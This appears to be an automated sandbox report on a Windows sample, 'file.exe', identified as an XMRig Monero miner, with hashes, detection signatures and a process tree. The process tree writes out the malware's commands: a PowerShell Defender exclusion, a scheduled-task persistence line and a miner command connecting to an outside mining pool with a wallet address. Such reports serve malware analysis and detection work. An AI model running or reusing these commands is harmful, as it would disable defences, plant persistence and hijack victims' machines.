Analysis
-
max time kernel
204s -
max time network
205s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
23-11-2022 17:09
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
1.3MB
-
MD5
63a5a9ecfd59f81c8c2744f54809c7f8
-
SHA1
fc9fa3765ac64a6c8a8607f3447d47151acbe7c4
-
SHA256
a07d160c21ffe45dfdcc0e0b1a485293063b9b1751f635b989fa41075019290a
-
SHA512
9356cfc34a4cf8736cbc6962be63527376590f96e04c91154071e5617e0876bb9aa04b0e7c5dde1d12e3b88d36b6150bfeaf8a2f09e0507e089b90ceb68b1071
-
SSDEEP
24576:WdcgTewpeuCLZQ5wrS7j5G1bDD6egAmkI:WdcgT1pehZQYYKTX
Malware Config
Signatures
-
XMRig Miner payload 7 IoCs
Processes:
resource yara_rule behavioral1/memory/992-145-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/992-147-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/992-149-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/992-150-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/992-152-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/992-160-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/992-164-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
OWT.exepid process 576 OWT.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 1768 cmd.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
OWT.exedescription pid process target process PID 576 set thread context of 992 576 OWT.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1084 timeout.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
file.exepowershell.exeOWT.exepowershell.exepid process 2020 file.exe 1300 powershell.exe 576 OWT.exe 2040 powershell.exe 576 OWT.exe 576 OWT.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 460 -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
file.exepowershell.exeOWT.exepowershell.exevbc.exedescription pid process Token: SeDebugPrivilege 2020 file.exe Token: SeDebugPrivilege 1300 powershell.exe Token: SeDebugPrivilege 576 OWT.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeLockMemoryPrivilege 992 vbc.exe Token: SeLockMemoryPrivilege 992 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 992 vbc.exe -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
file.execmd.exeOWT.execmd.exedescription pid process target process PID 2020 wrote to memory of 1300 2020 file.exe powershell.exe PID 2020 wrote to memory of 1300 2020 file.exe powershell.exe PID 2020 wrote to memory of 1300 2020 file.exe powershell.exe PID 2020 wrote to memory of 1768 2020 file.exe cmd.exe PID 2020 wrote to memory of 1768 2020 file.exe cmd.exe PID 2020 wrote to memory of 1768 2020 file.exe cmd.exe PID 1768 wrote to memory of 1084 1768 cmd.exe timeout.exe PID 1768 wrote to memory of 1084 1768 cmd.exe timeout.exe PID 1768 wrote to memory of 1084 1768 cmd.exe timeout.exe PID 1768 wrote to memory of 576 1768 cmd.exe OWT.exe PID 1768 wrote to memory of 576 1768 cmd.exe OWT.exe PID 1768 wrote to memory of 576 1768 cmd.exe OWT.exe PID 576 wrote to memory of 2040 576 OWT.exe powershell.exe PID 576 wrote to memory of 2040 576 OWT.exe powershell.exe PID 576 wrote to memory of 2040 576 OWT.exe powershell.exe PID 576 wrote to memory of 428 576 OWT.exe cmd.exe PID 576 wrote to memory of 428 576 OWT.exe cmd.exe PID 576 wrote to memory of 428 576 OWT.exe cmd.exe PID 428 wrote to memory of 884 428 cmd.exe schtasks.exe PID 428 wrote to memory of 884 428 cmd.exe schtasks.exe PID 428 wrote to memory of 884 428 cmd.exe schtasks.exe PID 576 wrote to memory of 992 576 OWT.exe vbc.exe PID 576 wrote to memory of 992 576 OWT.exe vbc.exe PID 576 wrote to memory of 992 576 OWT.exe vbc.exe PID 576 wrote to memory of 992 576 OWT.exe vbc.exe PID 576 wrote to memory of 992 576 OWT.exe vbc.exe PID 576 wrote to memory of 992 576 OWT.exe vbc.exe PID 576 wrote to memory of 992 576 OWT.exe vbc.exe PID 576 wrote to memory of 992 576 OWT.exe vbc.exe PID 576 wrote to memory of 992 576 OWT.exe vbc.exe PID 576 wrote to memory of 992 576 OWT.exe vbc.exe PID 576 wrote to memory of 992 576 OWT.exe vbc.exe PID 576 wrote to memory of 992 576 OWT.exe vbc.exe PID 576 wrote to memory of 992 576 OWT.exe vbc.exe PID 576 wrote to memory of 992 576 OWT.exe vbc.exe PID 576 wrote to memory of 992 576 OWT.exe vbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2FE.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:1084 -
C:\ProgramData\winrar\OWT.exe"C:\ProgramData\winrar\OWT.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"5⤵
- Creates scheduled task(s)
PID:884 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:992
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
MD563a5a9ecfd59f81c8c2744f54809c7f8
SHA1fc9fa3765ac64a6c8a8607f3447d47151acbe7c4
SHA256a07d160c21ffe45dfdcc0e0b1a485293063b9b1751f635b989fa41075019290a
SHA5129356cfc34a4cf8736cbc6962be63527376590f96e04c91154071e5617e0876bb9aa04b0e7c5dde1d12e3b88d36b6150bfeaf8a2f09e0507e089b90ceb68b1071
-
Filesize
1.3MB
MD563a5a9ecfd59f81c8c2744f54809c7f8
SHA1fc9fa3765ac64a6c8a8607f3447d47151acbe7c4
SHA256a07d160c21ffe45dfdcc0e0b1a485293063b9b1751f635b989fa41075019290a
SHA5129356cfc34a4cf8736cbc6962be63527376590f96e04c91154071e5617e0876bb9aa04b0e7c5dde1d12e3b88d36b6150bfeaf8a2f09e0507e089b90ceb68b1071
-
Filesize
137B
MD55eed7297d2782e9f5beec8d789c3857f
SHA1bcef837e2921aecdab04412d1cc0ed1f5726ffcd
SHA256be6e079e1b8201f58852a9c93b91e9920f7edc0a57c1e5187d817f09e57e8ba8
SHA5125b3a77a8a8c84ce66149bdfffd3b24fdf55a17a54c1feff3ceed9bc09d468f2bd8b5b1def5bb53ff4069ae741e3bbf37129982f499c9f18adb0f0bf280a4f522
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a23385795c7ccbd0fa471ccd581f4f3f
SHA1060b40cd410d35d6e9c0f93d37b3af256547ae2c
SHA256f55d4e461c4b67c530b18cae905564010c7785e095bc1aebb433437b7f9015a9
SHA512a48fa2490a097f75efeae5246a68721b7c9d0b90f0e1634ad5484f7e24ccf5971a1311d93825af852b3fe3f1aa42d25faf7d4e9716f1df933baed4785d340d22
-
Filesize
1.3MB
MD563a5a9ecfd59f81c8c2744f54809c7f8
SHA1fc9fa3765ac64a6c8a8607f3447d47151acbe7c4
SHA256a07d160c21ffe45dfdcc0e0b1a485293063b9b1751f635b989fa41075019290a
SHA5129356cfc34a4cf8736cbc6962be63527376590f96e04c91154071e5617e0876bb9aa04b0e7c5dde1d12e3b88d36b6150bfeaf8a2f09e0507e089b90ceb68b1071